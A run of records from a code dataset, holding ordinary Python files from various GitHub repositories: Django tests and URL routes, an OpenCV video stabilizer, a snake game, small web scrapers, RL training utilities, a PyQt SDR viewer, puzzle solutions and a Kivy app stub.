self.assertEquals(cards.count(), 1)\n\n def test_020_softdelete_vault(self):\n # create user\n user1token, workspace, vault, card = list(self.create_card())\n\n delete_vault_api_call(user1token, vault.get('id'))\n\n cards = Card.objects.filter(id=card.get('id'))\n self.assertEquals(cards.count(), 0)\n\n cards = Card.objects.include_deleted().filter(id=card.get('id'))\n self.assertEquals(cards.count(), 1)\n\n @unittest.skip(\"should be fixed asap\")\n def test_030_softdelete_workspace(self):\n\n user1token, workspace, vault, card = list(self.create_card())\n\n delete_workspace_api_call(user1token, vault.get('id'))\n\n cards = Card.objects.filter(id=card.get('id'))\n self.assertEquals(cards.count(), 0)\n\n cards = Card.objects.include_deleted().filter(id=card.get('id'))\n self.assertEquals(cards.count(), 1)\n\n\ndef card_softdelete_suite():\n suite = TestSuite()\n suite.addTest(unittest.TestLoader().loadTestsFromTestCase(\n CardSoftDeleteTest))\n return suite\n","repo_name":"witoon-acom/vaultier","sub_path":"vaultier/cards/tests/card_softdelete.py","file_name":"card_softdelete.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27127764204","text":"import logging\nfrom time import time\n\nimport cv2\nimport numpy as np\nfrom pathlib import Path\n\nfrom mediautil.video.vid import Vid\nfrom mediautil.image.img import Img\n\n\nclass Stabilizer:\n def __init__(\n self,\n vid: Vid,\n downscaling_factor: float = 2.0,\n ):\n \"\"\"\n Video stabilizer.\n Takes a Vid object and calculates translation/rotation transform for each frame.\n\n After stabilization, the frames returned will be post processed with the following strategy\n 1. The transform is shifted to be centered around median camera \"orientation\"\n 2. The image will be cropped (up to 20%) to minimize the amount of black borders\n 3. 
The image will be resized back to original image size\n \"\"\"\n self.vid = vid\n self.path = vid.path\n vid.as_img_objects = True\n self.as_img_objects = True\n\n original_output = vid.output_size\n vid.output_size = (\n int(original_output[0] / downscaling_factor),\n int(original_output[1] // downscaling_factor),\n )\n self.transform = self._calculate_transform()\n self.transform[:, :2] = self.transform[:, :2] * downscaling_factor\n vid.output_size = original_output\n\n self.transform = self.transform - np.median(self.transform, axis=0)\n self.post_process = self._get_post_process_func()\n\n # self.xmin, self.xmax = self.transform[:, 0].min(), self.transform[:, 0].max()\n # self.ymin, self.ymax = self.transform[:, 1].min(), self.transform[:, 1].max()\n # self.rmin, self.rmax = self.transform[:, 2].min(), self.transform[:, 2].max()\n\n # self.warp_shape = (int(self.vid._w + (self.xmax - self.xmin)), int(self.vid._h + (self.ymax - self.ymin)))\n\n # x = self.transform[:, 0]\n # y = self.transform[:, 1]\n # r = np.degrees(self.transform[:, 2])\n # from matplotlib import pyplot as plt\n # plt.plot(x, label='x')\n # plt.plot(y, label='y')\n # plt.plot(r, label='rotation')\n # plt.hlines(self.median_transform[0], xmin=0, xmax=len(self.vid), label='median x')\n # plt.hlines(self.median_transform[1], xmin=0, xmax=len(self.vid), label='median y')\n # plt.hlines(self.median_transform[2], xmin=0, xmax=len(self.vid), label='median y')\n # plt.legend()\n # plt.show()\n\n self._frame_iterator = iter(self.vid)\n self._transform_iterator = iter(self.transform)\n\n def _get_post_process_func(self):\n def f(image):\n s = image.shape\n T = cv2.getRotationMatrix2D((s[1] / 2, s[0] / 2), 0, 1.1)\n return cv2.warpAffine(image, T, (s[1], s[0]))\n\n return f\n\n def _calculate_transform(self):\n transform = np.zeros((len(self.vid) - 1, 3))\n\n iterator = iter(self.vid)\n previous = next(iterator)\n\n t = time()\n for i in range(transform.shape[0] - 1):\n # Detect feature points in previous frame\n prev_pts = cv2.goodFeaturesToTrack(\n previous.gray[..., 0],\n maxCorners=200,\n qualityLevel=0.01,\n minDistance=30,\n blockSize=3,\n )\n current = next(iterator)\n\n # Calculate optical flow (i.e. 
track feature points)\n            curr_pts, status, err = cv2.calcOpticalFlowPyrLK(\n                previous.gray[..., 0], current.gray[..., 0], prev_pts, None\n            )\n\n            # Sanity check\n            assert prev_pts.shape == curr_pts.shape\n\n            # Filter only valid points\n            idx = np.where(status == 1)[0]\n            prev_pts = prev_pts[idx]\n            curr_pts = curr_pts[idx]\n\n            # Find transformation matrix\n            m = cv2.estimateAffinePartial2D(prev_pts, curr_pts)[0]\n\n            # Extract translation\n            dx = m[0, 2]\n            dy = m[1, 2]\n\n            # Extract rotation angle\n            dr = np.arctan2(m[1, 0], m[0, 0])\n\n            transform[i] = [dx, dy, dr]\n            previous = current\n\n        trajectory = np.cumsum(-transform, axis=0)\n        smoothed_trajectory = np.array(trajectory)\n        # Moving average of transform as smoothing strategy\n        r = 2  # Smoothing radius\n        window_size = 2 * r + 1\n        for i in range(3):\n            f = np.ones(window_size) / window_size\n            padded = np.lib.pad(trajectory[:, i], (r, r), \"edge\")\n            smooth_padded = np.convolve(padded, f, mode=\"same\")\n            smoothed_trajectory[:, i] = smooth_padded[r:-r]\n\n        # from matplotlib import pyplot as plt\n        # plt.plot(smoothed_trajectory[:, 0], label='x')\n        # plt.plot(smoothed_trajectory[:, 1], label='y')\n\n        # plt.plot(trajectory[:, 0], linestyle='dashed', label='original x')\n        # plt.plot(trajectory[:, 1], linestyle='dashed', label='original y')\n        # plt.show()\n\n        logging.debug(f\"calculated transform\\t{time()-t}s\")\n        return smoothed_trajectory\n\n    def __iter__(self) -> \"Stabilizer\":\n        self._frame_iterator = iter(self.vid)\n        self._transform_iterator = iter(self.transform)\n        return self\n\n    def __next__(self):\n        image = next(self._frame_iterator).get()\n        dx, dy, dr = next(self._transform_iterator)\n\n        m = np.array([[np.cos(dr), -np.sin(dr), dx], [np.sin(dr), np.cos(dr), dy]])\n\n        image_stab = cv2.warpAffine(image, m, self.vid.wh)\n\n        output = self.post_process(image_stab)\n        if self.as_img_objects:\n            return Img(output, numpy_color_mode=self.vid.color_mode)\n        return output\n\n    def __len__(self):\n        return len(self.vid)\n\n    def __str__(self):\n        return f\"Stabilized {self.vid}\"\n\n    def show(self, fs=False, fps=None):\n        \"\"\"\n        Show video using cv2.\n        Function uses preset colormode and image size.\n\n        use 'q' to stop video\n\n        :param fs: Show in fullscreen\n        :param fps: overwrite video FPS for visualization. 
0 to step through frame by frame\n        \"\"\"\n        fps = self.vid.fps if fps is None else fps\n        wait_time = int(1000 / fps) if fps != 0 else 0\n        name = \"\"\n        if fs:\n            cv2.namedWindow(name, cv2.WND_PROP_FULLSCREEN)\n            cv2.setWindowProperty(name, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n\n        for image in self:\n            cv2.imshow(name, image)\n            if ord(\"q\") == cv2.waitKey(wait_time):\n                break\n        cv2.destroyAllWindows()\n\n    @property\n    def fps(self):\n        return self.vid._fps\n\n    @property\n    def wh(self):\n        return self.vid.wh\n\n    @property\n    def color_mode(self):\n        return self.vid.color_mode\n\n    @property\n    def hw(self):\n        return self.vid.hw\n\n\nif __name__ == \"__main__\":\n    # Stabilizer(Vid('3.webm'), downscaling_factor=4).show()\n\n    for p in Path(\"/home/martin/repos/BIO/demo/video\").glob(\"*\"):\n        v = Stabilizer(Vid(p), downscaling_factor=3).show()\n\n    # from matplotlib import pyplot as plt\n\n    # logging.getLogger().setLevel(logging.DEBUG)\n    # dsfs = [1., 1.5, 2., 3., 4.]\n    # timespv = []\n    # for p in Path('/home/martin/repos/BIO/demo/video').glob('*'):\n    #     times = []\n    #     for dsf in dsfs:\n    #         times.append(time())\n    #         v = Stabilizer(Vid(p), downscaling_factor=dsf)\n    #         times[-1] = time() - times[-1]\n\n    #     timespv.append(times)\n\n    # plt.boxplot(np.array(timespv), labels=[f'Factor: {d}' for d in dsfs])\n    # plt.ylabel('time')\n    # plt.show()\n","repo_name":"biometrical-as/mediautil","sub_path":"mediautil/video/stabilizer.py","file_name":"stabilizer.py","file_ext":"py","file_size_in_byte":7520,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"2952005131","text":"SEGMENT_DISTANCE = 20\nUP = 90\nRIGHT = 0\nDOWN = 270\nLEFT = 180\n\n\nclass Snake:\n    def __init__(self):\n        self.segments = []\n        self.start()\n        self.speed = 10\n        self.head = self.segments[0]\n\n    def start(self):\n        x_cor = 0\n        for segment in range(3):\n            self.add_segment((x_cor, 0))\n            x_cor -= 20\n\n    def move(self):\n        for segment in range(len(self.segments) - 1, 0, -1):\n            x = self.segments[segment - 1].xcor()\n            y = self.segments[segment - 1].ycor()\n            self.segments[segment].goto(x, y)\n        self.head.forward(self.speed)\n\n    def up(self):\n        if self.head.heading() != DOWN:\n            self.head.setheading(UP)\n\n    def right(self):\n        if self.head.heading() != LEFT:\n            self.head.setheading(RIGHT)\n\n    def down(self):\n        if self.head.heading() != UP:\n            self.head.setheading(DOWN)\n\n    def left(self):\n        if self.head.heading() != RIGHT:\n            self.head.setheading(LEFT)\n\n    def controls(self):\n        from turtle import Screen\n        s = Screen()\n        s.listen()\n        s.onkey(self.up, \"Up\")\n        s.onkey(self.right, \"Right\")\n        s.onkey(self.down, \"Down\")\n        s.onkey(self.left, \"Left\")\n\n    def add_segment(self, position):\n        from turtle import Turtle\n        segment = Turtle(shape=\"square\")\n        segment.color(\"white\")\n        segment.penup()\n        segment.goto(position)\n        self.segments.append(segment)\n\n    def extend(self):\n        self.add_segment(self.segments[-1].position())\n","repo_name":"ngeksdev/snake-py","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42632625709","text":"#pip install lxml\n\nfrom bs4 import BeautifulSoup\nimport requests\n\nurl = 'https://olivesfordinner.com/category/appetizers/page/2'\nresponse = requests.get(url)\nhtmlText = response.text\n\n\n\nsoup = BeautifulSoup(htmlText, 'lxml')\nlinks = soup.find_all('article')\n\nlinkList = []\ntitleList = []\n\n#there are 12 recipe titles per 
appetizer page, \n#find the links and titles and put them each into a list\nfor link in links[0:12]:\n hyperL = link.find('header', class_ = 'entry-header').a['href']\n linkList.append(hyperL)\nfor title in links:\n x = title.get('aria-label')\n titleList.append(x)\n\n#pair the title with its corresponding link in a new list\nlist3 = [[x,y] for x,y in zip(titleList, linkList)]\n\nzzz = list3[8][1]\nprint(zzz)\n\n#to write list3 into the text file.\n'''for elem in list3:\n with open('test.txt', 'w') as f:\n f.write('\\n \\n'.join(map(str, list3)))'''\n ","repo_name":"youoldmiyoung/recipe-aggregator","sub_path":"recipes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13369239942","text":"\nfrom .models import Available_Day, Booking, Order \n\ndef removeSlot(booking, Time_From, totalSlotTime, totalSlotTime2):\n time_list = booking.time_list\n if totalSlotTime2 != 0:\n numberdec = (totalSlotTime2 / 0.5) - 1\n else: \n numberdec = 0\n remove_slot = Time_From + totalSlotTime + numberdec\n for v in range(Time_From, remove_slot + 1):\n time_list.remove(v)\n \n\n \n\n \n \n \n\n\n","repo_name":"ModeraLTD/afterglow_website","sub_path":"website/booking_slot.py","file_name":"booking_slot.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42258175017","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nclass GoogleImageSearch:\n def __init__(self):\n self.driver = webdriver.Chrome() # Initialize Chrome WebDriver\n\n def fetch_links_by_search(self, search_query):\n # Navigate to Google Images\n self.driver.get('https://www.google.com/imghp?hl=EN')\n\n # Find the search bar and input the search query\n search_box = self.driver.find_element(By.XPATH, \"//textarea[@name='q']\")\n search_box.send_keys(search_query)\n search_box.submit()\n\n # Wait for search results to load (add any additional wait if required)\n self.driver.implicitly_wait(5)\n\n # Find all
<a> elements with href containing \"/tec\"\n        links = self.driver.find_elements(By.XPATH, \"//a[contains(@href, '/tec')]\")\n\n        # Extract and print the links\n        for link in links:\n            href_value = link.get_attribute('href')\n            print(href_value)\n\n        # Close the WebDriver\n        self.driver.quit()\n\n# Example usage: \nif __name__ == \"__main__\":\n    search_query = \"tech\" \n    google_image_search = GoogleImageSearch()\n    google_image_search.fetch_links_by_search(search_query)\n","repo_name":"BASILAHAMED/fetch-Google-Links","sub_path":"fetch_google_links.py","file_name":"fetch_google_links.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7688597660","text":"\"\"\"Training utility functions.\"\"\"\n\nimport torch\nimport torch.nn as nn\nfrom torch.distributions import Categorical\n\nfrom rllib.util.neural_networks.utilities import one_hot_encode\n\n\ndef get_target(model, observation):\n    \"\"\"Get target from observation.\"\"\"\n    if model.model_kind == \"dynamics\":\n        target = observation.next_state\n    elif model.model_kind == \"rewards\":\n        target = observation.reward.unsqueeze(-1)\n    elif model.model_kind == \"termination\":\n        target = observation.done\n    else:\n        raise NotImplementedError\n    return target\n\n\ndef gaussian_cdf(x, mean, chol_std):\n    \"\"\"Get cdf of multi-variate gaussian.\"\"\"\n    scale = torch.diagonal(chol_std, dim1=-1, dim2=-2)\n    z = (x - mean) / (scale + 1e-6)\n    return 0.5 * (1 + torch.erf(z / torch.sqrt(torch.tensor(2.0))))\n\n\ndef calibration_count(target, mean, chol_std, buckets):\n    \"\"\"Get the calibration count of a target for the given buckets.\"\"\"\n    p_hat = gaussian_cdf(target, mean, chol_std).reshape(-1)\n    total = len(p_hat)\n\n    count = []\n    for p in buckets:\n        count.append((p_hat <= p).sum().double() / total)\n    count = torch.tensor(count)\n\n    return count\n\n\ndef calibration_score(model, observation, bins=10):\n    \"\"\"Get calibration score of a model.\n\n    References\n    ----------\n    Gneiting, T., & Raftery, A. E. (2007).\n    Strictly proper scoring rules, prediction, and estimation. JASA.\n\n    Brier, G. W. (1950).\n    Verification of forecasts expressed in terms of probability. Monthly weather review.\n\n    Kuleshov, V., Fenner, N., & Ermon, S. (2018).\n    Accurate uncertainties for deep learning using calibrated regression. ICML.\n    Equation (9).\n    \"\"\"\n    state, action = observation.state, observation.action\n    target = get_target(model, observation)\n    prediction = model(state, action)\n    if len(prediction) == 1:\n        logits = prediction[0]\n        probabilities = Categorical(logits=logits).probs\n        labels = one_hot_encode(target, num_classes=logits.shape[-1])\n        calibration_error = torch.mean((probabilities - labels) ** 2)\n    else:\n        mean, chol_std = prediction\n        buckets = torch.linspace(0, 1, bins + 1)\n        count = calibration_count(target, mean, chol_std, buckets)\n        calibration_error = torch.sum((buckets - count) ** 2)\n    return calibration_error\n\n\ndef sharpness(model, observation):\n    \"\"\"Get prediction sharpness score.\n\n    References\n    ----------\n    Kuleshov, V., Fenner, N., & Ermon, S. (2018).\n    Accurate uncertainties for deep learning using calibrated regression. 
ICML.\n Equation (10).\n \"\"\"\n mean, chol_std = model(observation.state, observation.action)\n scale = torch.diagonal(chol_std, dim1=-1, dim2=-2)\n return scale.square().mean()\n\n\ndef model_mse(model, observation):\n \"\"\"Get model MSE.\"\"\"\n state, action = observation.state, observation.action\n target = get_target(model, observation)\n\n mean = model(state, action)[0]\n y = target\n\n return ((mean - y) ** 2).mean(-1).mean()\n\n\ndef model_loss(model, observation):\n \"\"\"Get model loss.\"\"\"\n state, action = observation.state, observation.action\n target = get_target(model, observation)\n\n prediction = model(state, action)\n if len(prediction) == 1: # Cross entropy loss.\n return nn.CrossEntropyLoss(reduction=\"none\")(prediction[0], target)\n\n mean, scale_tril = prediction[0], prediction[1]\n y = target\n if torch.all(scale_tril == 0): # Deterministic Model\n loss = ((mean - y) ** 2).mean(-1)\n else: # Probabilistic Model\n scale_tril_inv = torch.inverse(scale_tril)\n delta = scale_tril_inv @ ((mean - y).unsqueeze(-1))\n loss = (delta.transpose(-2, -1) @ delta).squeeze()\n\n # log det \\Sigma = 2 trace log (scale_tril)\n idx = torch.arange(mean.shape[-1])\n loss += 2 * torch.log(scale_tril[..., idx, idx]).mean(dim=-1).squeeze()\n return loss\n\n\nclass Evaluate(object):\n \"\"\"Context manager for evaluating an agent.\"\"\"\n\n def __init__(self, agent):\n self.agent = agent\n\n def __enter__(self):\n \"\"\"Set the agent into eval mode.\"\"\"\n self.agent.eval()\n\n def __exit__(self, *args):\n \"\"\"Set the agent into training mode.\"\"\"\n self.agent.train()\n","repo_name":"djtom98/RL_qreps","sub_path":"rllib/rllib/util/training/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23413963656","text":"from PyQt5 import QtGui\nfrom PyQt5.QtWidgets import QWidget, QLabel, QVBoxLayout, QHBoxLayout, QLineEdit, QPushButton, QCheckBox, QProgressBar\nfrom PyQt5.QtGui import QPixmap\nimport cv2\nfrom PyQt5.QtCore import pyqtSlot, Qt\nimport numpy as np\nfrom framegrabber_thread import VideoThread\nimport matplotlib.pyplot as plt\nfrom utils import get_img_array, get_model, norm_image_and_predict\nfrom settings import SdrSettings\nfrom matplotlib.mlab import psd\n\n\nclass App(QWidget):\n def __init__(self):\n super().__init__()\n\n self.setWindowTitle(\"~ Edgise Live SDR ~\")\n self.setMinimumWidth(900)\n\n self.sdr_settings = SdrSettings(load_from_file=True,\n filename=\"settings.json\",\n img_size=(1000, 1000),\n axes_off=False,\n predict=False)\n\n if self.sdr_settings.predict:\n self.model = get_model(\"models/model_it1.h5\")\n else:\n self.model = None\n\n # create the label that holds the image\n self.image_label = QLabel(self)\n self.image_label.resize(*self.sdr_settings.img_size)\n\n self.update_button = QPushButton('Update')\n\n fixed_width_labels = 80\n self.nfft_label = QLabel('NFFT')\n self.nfft_label.setFixedWidth(fixed_width_labels)\n self.gain_label = QLabel('gain')\n self.gain_label.setFixedWidth(fixed_width_labels)\n self.bandwidth_label = QLabel('bandwidth')\n self.bandwidth_label.setFixedWidth(fixed_width_labels)\n self.read_label = QLabel('read size')\n self.read_label.setFixedWidth(fixed_width_labels)\n self.samplefreq_label = QLabel('sample freq')\n self.samplefreq_label.setFixedWidth(fixed_width_labels)\n self.centerfreq_label = QLabel('center freq')\n self.centerfreq_label.setFixedWidth(fixed_width_labels)\n\n 
self.pred_bar = QProgressBar()\n self.pred_bar.setValue(50)\n\n self.axesoff_label = QLabel(\" \")\n self.axesoff_label.setFixedWidth(fixed_width_labels)\n self.axesoff_checkbox = QCheckBox(\"Axes off\")\n self.axesoff_checkbox.setChecked(self.sdr_settings.axes_off)\n\n self.nfft_input = QLineEdit(str(self.sdr_settings.nfft))\n self.gain_input = QLineEdit(str(self.sdr_settings.gain))\n self.bandwidth_input = QLineEdit(str(self.sdr_settings.bandwidth))\n self.read_input = QLineEdit(str(self.sdr_settings.DEFAULT_READ_SIZE))\n self.samplefreq_input = QLineEdit(str(self.sdr_settings.sample_rate))\n self.centerfreq_input = QLineEdit(str(self.sdr_settings.center_freq))\n\n nfft_layout = QHBoxLayout()\n nfft_layout.addWidget(self.nfft_label)\n nfft_layout.addWidget(self.nfft_input)\n\n gain_layout = QHBoxLayout()\n gain_layout.addWidget(self.gain_label)\n gain_layout.addWidget(self.gain_input)\n\n bandwidth_layout = QHBoxLayout()\n bandwidth_layout.addWidget(self.bandwidth_label)\n bandwidth_layout.addWidget(self.bandwidth_input)\n\n read_layout = QHBoxLayout()\n read_layout.addWidget(self.read_label)\n read_layout.addWidget(self.read_input)\n\n sample_layout = QHBoxLayout()\n sample_layout.addWidget(self.samplefreq_label)\n sample_layout.addWidget(self.samplefreq_input)\n\n center_layout = QHBoxLayout()\n center_layout.addWidget(self.centerfreq_label)\n center_layout.addWidget(self.centerfreq_input)\n\n axesoff_layout = QHBoxLayout()\n axesoff_layout.addWidget(self.axesoff_label)\n axesoff_layout.addWidget(self.axesoff_checkbox)\n\n vbox_right = QVBoxLayout()\n vbox_right.addLayout(nfft_layout)\n vbox_right.addLayout(gain_layout)\n vbox_right.addLayout(bandwidth_layout)\n vbox_right.addLayout(sample_layout)\n vbox_right.addLayout(center_layout)\n vbox_right.addLayout(read_layout)\n vbox_right.addLayout(axesoff_layout)\n vbox_right.addWidget(self.update_button)\n\n vbox_left = QVBoxLayout()\n vbox_left.addWidget(self.image_label)\n vbox_left.addWidget(self.pred_bar)\n\n # create a vertical box layout and add the two labels\n hbox = QHBoxLayout()\n hbox.addLayout(vbox_left)\n hbox.addLayout(vbox_right)\n\n # set the vbox layout as the widgets layout\n self.setLayout(hbox)\n\n # create the video capture thread\n self.thread = VideoThread(self.sdr_settings)\n # connect its signal to the update_image slot\n self.thread.change_pixmap_signal.connect(self.update_image)\n self.update_button.clicked.connect(self.update_settings)\n # start the thread\n self.thread.start()\n\n def closeEvent(self, event):\n self.thread.stop()\n event.accept()\n\n def update_settings(self):\n if self.gain_input.text() != \"auto\":\n self.sdr_settings.gain = int(self.gain_input.text())\n else:\n self.sdr_settings.gain = 'auto'\n\n self.sdr_settings.bandwidth = int(self.bandwidth_input.text())\n self.sdr_settings.sample_rate = int(self.samplefreq_input.text())\n self.sdr_settings.center_freq = int(self.centerfreq_input.text())\n self.sdr_settings.nfft = int(self.nfft_input.text())\n self.sdr_settings.DEFAULT_READ_SIZE = int(self.read_input.text())\n self.sdr_settings.axes_off = bool(self.axesoff_checkbox.isChecked())\n\n self.sdr_settings.save_to_file(create=True)\n\n self.thread.restart(self.sdr_settings)\n\n @pyqtSlot(np.ndarray)\n def update_image(self, samples):\n \"\"\"Updates the image_label with a new opencv image\"\"\"\n\n fig, ax = plt.subplots(nrows=1,\n ncols=1,\n figsize=(self.sdr_settings.img_size[0] // 100, self.sdr_settings.img_size[1] // 100),\n dpi=100) # two axes on figure\n new_psd, new_freq = psd(samples,\n 
NFFT=self.sdr_settings.nfft,\n Fs=self.sdr_settings.sample_rate)\n\n new_freq += self.sdr_settings.center_freq\n\n # print(new_freq.shape)\n\n new_psd = new_psd - np.min(new_psd)\n\n xlim = [self.sdr_settings.center_freq - self.sdr_settings.bandwidth // 2,\n self.sdr_settings.center_freq + self.sdr_settings.bandwidth // 2]\n\n lower_index = np.argmax(new_freq > xlim[0])\n upper_index = np.argmax(new_freq > xlim[1])\n\n new_freq = new_freq[lower_index:upper_index]\n new_psd = new_psd[lower_index:upper_index]\n\n new_psd = new_psd - np.min(new_psd)\n\n ax.set_ylim([0, 0.0004])\n if self.sdr_settings.axes_off:\n ax.axis(\"off\")\n ax.plot(new_psd, color=\"black\")\n img = get_img_array(fig, img_shape=self.sdr_settings.img_size).copy()\n\n if self.sdr_settings.predict:\n pred = norm_image_and_predict(img, self.model)\n val = pred * 100\n self.pred_bar.setValue(val)\n\n qt_img = self.convert_cv_qt(img)\n self.image_label.setPixmap(qt_img)\n plt.close(fig)\n\n def convert_cv_qt(self, cv_img):\n \"\"\"Convert from an opencv image to QPixmap\"\"\"\n rgb_image = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)\n h, w, ch = rgb_image.shape\n bytes_per_line = ch * w\n convert_to_Qt_format = QtGui.QImage(rgb_image.data, w, h, bytes_per_line, QtGui.QImage.Format_RGB888)\n p = convert_to_Qt_format.scaled(*self.sdr_settings.img_size, Qt.KeepAspectRatio)\n return QPixmap.fromImage(p)\n","repo_name":"samsterckval/SDR_VIEWR","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33340738941","text":"class Solution:\n def maxCoins(self, piles: List[int]) -> int:\n piles.sort()\n you = len(piles)-2\n bob = 0\n res = 0\n while bob nums[-1] * count:\n return\n if count == 2:\n left, right = 0, len(nums) - 1\n while left < right:\n s = nums[left] + nums[right]\n if s == target:\n final.append(result + [nums[left], nums[right]])\n left += 1\n while left < right and nums[left] == nums[left+1]:\n left += 1\n if s < target:\n left += 1\n else:\n right -= 1\n else:\n for i in range(len(nums) - count + 1):\n if i == 0 or (i > 0 and nums[i - 1] != nums[i]):\n findNsum(nums[i+1:], target - nums[i], count-1, result + [nums[i]], final)\n return\n\n r = []\n final = []\n findNsum(nums, target, 4, r, final)\n return final\n\n\n","repo_name":"hyt0617/leetcode","sub_path":"10-19/lc_18_fourSum.py","file_name":"lc_18_fourSum.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15033655929","text":"AX,AY,BX,BY = map(int,input().split())\r\nN = int(input())\r\nsrc = [tuple(map(int,input().split())) for i in range(N)]\r\nsrc.append(src[0])\r\n\r\ndef cross_prod(ax,ay,bx,by,px,py):\r\n v1x = bx - ax\r\n v1y = by - ay\r\n v2x = px - ax\r\n v2y = py - ay\r\n return v1x * v2y - v1y * v2x\r\n\r\ndef is_crossing(x11,y11,x12,y12,x21,y21,x22,y22):\r\n l1_p21 = cross_prod(x11,y11,x12,y12,x21,y21)\r\n l1_p22 = cross_prod(x11,y11,x12,y12,x22,y22)\r\n l2_p11 = cross_prod(x21,y21,x22,y22,x11,y11)\r\n l2_p12 = cross_prod(x21,y21,x22,y22,x12,y12)\r\n return l1_p21 * l1_p22 < 0 and l2_p11 * l2_p12 < 0\r\n\r\nans = 0\r\nfor (x1,y1),(x2,y2) in zip(src, src[1:]):\r\n if is_crossing(AX,AY,BX,BY,x1,y1,x2,y2):\r\n ans += 1\r\nprint(ans//2 + 1)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source 
Codes/AtCoder/abc016/D/3829901.py","file_name":"3829901.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"1793674988","text":"\"\"\"trainermanagementsystem URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n    https://docs.djangoproject.com/en/4.1/topics/http/urls/\r\nExamples:\r\nFunction views\r\n    1. Add an import:  from my_app import views\r\n    2. Add a URL to urlpatterns:  path('', views.home, name='home')\r\nClass-based views\r\n    1. Add an import:  from other_app.views import Home\r\n    2. Add a URL to urlpatterns:  path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n    1. Import the include() function: from django.urls import include, path\r\n    2. Add a URL to urlpatterns:  path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.contrib import admin\r\nfrom django.urls import path, include\r\n\r\nfrom django.urls import path\r\n\r\nfrom trainerapp import views\r\n\r\nurlpatterns=[\r\n    path('register',views.reg_fun,name='register'), #it will display register.html\r\n    path('regdata',views.reg_data_fun), #it will store the data either in User table or in reg table\r\n    path('log',views.log_fun,name='log'), #it will display login.html\r\n    path('logread',views.log_read_fun), #it will validate the submitted login data\r\n    path('Ahome', views.admin_home_fun, name='Ahome'), #display Admin homepage\r\n    path('Thome', views.trainer_home_fun, name='Thome'), #it will display Trainer Homepage\r\n    path('trainer_details',views.trainer_details, name='trainer_details'),# it will display all the trainer details\r\n    path('delete/<int:pk>',views.delete_fun,name='delete'),#it will delete a particular trainer's details\r\n    path('batch_Assign', views.batch_data_fun,name='batch_Assign'),\r\n    path('readdata',views.batch_assign_fun),\r\n    path('batchdetails',views.batch_details, name='batchdetails'),\r\n    path('log_out',views.logout_fun,name='log_out')\r\n\r\n\r\n]\r\n\r\n","repo_name":"mallikarjunteli/Trainer-Management-System","sub_path":"trainermanagementsystem/trainerproject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10393338679","text":"# https://programmers.co.kr/learn/courses/30/lessons/12982\n\ndef solution(d, budget):\n    d = sorted(d)\n    i = 1\n    while sum(d[:i]) <= budget and i <= len(d):\n        i += 1\n    \n    answer = i - 1\n    return answer\n","repo_name":"beyondthemist/Problem-solving-solution","sub_path":"Programmers/lv.1/12982/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22832568579","text":"from django.urls import path, include\nfrom . 
import views\n\napp_name = 'mainapp'\n\nurlpatterns = [\n    path('', views.index, name='index'),\n    path('contact/', views.contact, name='contact'),\n    path('products/', views.products, name='products'),\n    path('category/<int:pk>/', views.ProductsListView.as_view(), name='category'),\n    path('product/<int:pk>/', views.product, name='product'),\n\n]\n","repo_name":"Shrimp-pixel/furnatureShop","sub_path":"mysite/mainapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5797721342","text":"import os, json\nfrom kivy.properties import (\n\tStringProperty, ColorProperty,\n\tObjectProperty\n)\nfrom kivy.utils import get_color_from_hex\nfrom kivy.app import App\nfrom kivygo.utils import do_correction_path\nfrom kivygo import colors\n\n\nclass kivygoApp(App):\n\n\t# primary_color = ColorProperty(\"\")\n\t# secondary_color = ColorProperty(\"\")\n\t# accent_color = ColorProperty(\"\")\n\t# background_color = ColorProperty(\"\")\n\t# foreground_color = ColorProperty(\"\")\n\t# border_color = ColorProperty(\"\")\n\t# text_color = ColorProperty(\"\")\n\t# heading_color = ColorProperty(\"\")\n\t# subheading_color = ColorProperty(\"\")\n\t# error_color = ColorProperty(\"\")\n\t# success_color = ColorProperty(\"\")\n\t# warning_color = ColorProperty(\"\")\n\t# info_color = ColorProperty(\"\")\n\t# disabled_color = ColorProperty(\"\")\n\t# active_color = ColorProperty(\"\")\n\t# inactive_color = ColorProperty(\"\")\n\t# hover_color = ColorProperty(\"\")\n\t# focus_color = ColorProperty(\"\")\n\t# selected_color = ColorProperty(\"\")\n\t# 